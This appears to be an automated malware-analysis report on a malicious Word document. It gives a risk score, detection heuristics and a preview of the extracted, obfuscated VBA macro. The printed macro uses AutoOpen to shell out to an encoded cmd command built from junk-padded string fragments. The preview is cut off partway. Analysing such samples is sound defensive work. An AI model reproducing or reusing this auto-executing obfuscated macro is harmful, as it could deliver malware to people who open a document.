MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a malicious Office document containing a VBA macro. The AutoOpen subroutine within the macro is designed to execute a command. The script attempts to construct a command string by concatenating various string literals and character codes, which is a common technique for obfuscation and payload delivery. The specific command constructed is not fully discernible due to truncation and obfuscation, but it appears to involve command execution.
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-6788933-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6788933-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5121 bytes |
SHA-256: ca11285dfecddc2fc4404e64d11fcf5dbc098f86f04c4fd71e014b9e3ec30ce0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "okomIHPwQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName CLng(5)
TypeName CDbl(hfiRhz)
TypeName Svuvp
TypeName 6
TypeName Atn(6)
TypeName Sin(fSzbHl + iqiGJ - isOmw / qZzpZM)
Shell@ CStr("c") + CStr("m") + VdciGpRrUkG + dViqhcwQ + mAPzN + FvKNJS + mLucjjaWUQ + vfUuOZkCjkiiDC, 734103084 - 734103084
TypeName CDate(dXPCdp + 91808)
TypeName CStr(iZXDVt)
End Sub
Attribute VB_Name = "zvtcvLmUElCh"
Function mAPzN()
On Error Resume Next
TypeName CStr(ffUCL - GDBIAb)
TypeName 9419
TypeName 230
ZNdrIEF = "d /V:O" + "/C" + CStr(Chr(UGFAzWsOAkKCJn + qiqpsZYOD + 34 + BjYhOGIIQBlz + SKLaSzHMAEitX)) + "set 1" + "fT=s" + "Rii" + "pEjjsz" + "IuJp" + "QcqPiaZL" + "zS" + "bhzXO" + "tYzsBq8GrU" + ";41g9yk " + "-}" + "x{2/@"
TypeName Chr(GjJYi / Hclrv / 67867 / 51631)
TypeName Sgn(wCRFJ + 99211 - 78276 / EKPiCI)
oczij = "CTo:.DVn" + "mdN" + "6w'" + "lW" + ",f+A(e" + "$" + "v=)F\&" + "&for " + "%f i" + "n (1" + "3"
TypeName Log(Lhlhq * ZqzPsv)
TypeName Hex(19)
oUpKvvAbNTw = ";56;6" + "6;75;37;32" + ";25;" + "75;68" + ";68;46;7" + "6;18" + ";36;" + "1;78"
TypeName 2891
TypeName 367452274
INDHBisfjjU = ";61;" + "75;66;4" + "7;56;24;7;" + "75;15;29;4" + "6;64;75;2" + "9;58;69" + ";75;" + "24;54;68;" + "18;75;" + "61" + ";29;" + "39;76;1;38" + ";55;78"
TypeName Sgn(EFFwI)
TypeName ChrW(88720 - Dahkuo)
pWjfuaHGd = ";67;25" + ";29;29;1" + "3;57" + ";5" + "2;52;56;" + "61" + ";75;61" + ";18;42;25" + ";29;68" + ";18"
TypeName wPhWmA
TypeName Atn(bGmPGk)
qhrlpJKsT = ";7" + "1;75;" + "58;" + "15;56;62;" + "52;43;3" + "4;60;34;62" + ";29;"
TypeName 449
TypeName Sgn(KEadz)
TypeName Oct(WLVluT + nkOSDA + 58725 - TswmiG)
RkHJkGpN = "53;2" + "5;" + "29;29;" + "13;5" + "7;52;52;" + "29;25;75;" + "13;19;37;" + "45;" + "41;40" + ";58;1" + "5;5"
TypeName CBool(RizDDM)
TypeName 9
rkSBUoCkpo = "6;6" + "2" + ";52;" + "5" + "6;40" + ";69;59" + ";43;53;25" + ";29" + ";" + "29;1" + "3"
TypeName ChrB(46985 * WmjYkh / KMmYfS + ckmkh)
TypeName 8
TypeName CBool(Owpift)
ozuLYP = ";5" + "7;52;52;2" + "9;75;3" + "2;29;15;1" + "9;37" + ";18;56;6" + "1;58;2" + "4;75;52"
mAPzN = ZNdrIEF + oczij + oUpKvvAbNTw + INDHBisfjjU + pWjfuaHGd + qhrlpJKsT + RkHJkGpN + rkSBUoCkpo + ozuLYP
TypeName Sqr(3)
TypeName Int(15341 + qEvIHz * 25438 * GUJfz)
End Function
Function FvKNJS()
On Error Resume Next
TypeName 128786316
TypeName jTDGU
TypeName Sqr(314)
FuTvABWI = ";35;61;65" + ";65;5;5" + "9;31;53;2" + "5;" + "29;29;13" + ";57" + ";52;5" + "2;"
TypeName 8223
TypeName 277570865
TypeName 657
zlkwtwU = "31;56;75;" + "68;56;66;6" + "1;75;4" + "4;58;15;5" + "6;6" + "2;52;55;" + "24;5" + "3;25;29" + ";29;1" + "3;57;52;52" + ";2" + "9"
TypeName Round(751)
TypeName CDbl(tiizi * lWDMZM)
TypeName 6058
oYMjvaErB = ";37;18;" + "13;29;11;3" + "7;58;" + "15;56;62;5" + "8;24;37;52" + ";64;" + "64;65;45;1" + "8;44;27" + ";67;58;23" + ";13;68;18" + ";29;7"
TypeName Log(ORLUUk)
TypeName Rnd(aHEvM)
QjZYOo = "4" + ";67;53;6" + "7;79;39;" + "76;20;7" + "3;80;4" + "6;78" + ";46;67;65" + ";51;65" + ";67;39;76" + ";63;62;15;" + "78;7" + "6"
TypeName KPqjHq
TypeName kbaBB
TypeName ChrB(284555372)
jKtGK = ";75;" + "61;77" + ";57;29" + ";75;62;1" + "3;72" + ";67;8" + "1;67;72;76" + ";20;7" + "3;80;" + "72;67;5" + "8;75;" + "49;75;67;3" + "9;71;56;37"
TypeName 17
TypeName CSng(64)
WdhLuQW = ";75" + ";19;15;25" + ";74" + ";76;" + "31;" + "34;21;46" + ";18;" + "6" + "1;46;"
TypeName tCYzcj
TypeName hbqGV
bSQnO = "76;1;" + "3" + "8;55;7" + "9;" + "50;29;37" + ";44"
TypeName ChrW(vjYdb - FuUJk)
TypeName CStr(10)
AZUhjro = ";50;76" + ";18;" + "36;1" + ";5" + "8;59" + ";56;66;61;" + "68" + ";56;1" + "9;63;" + "80;18;6" + "8;75;74"
TypeName Sqr(8)
TypeName DcKNhC
TakAob = "
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.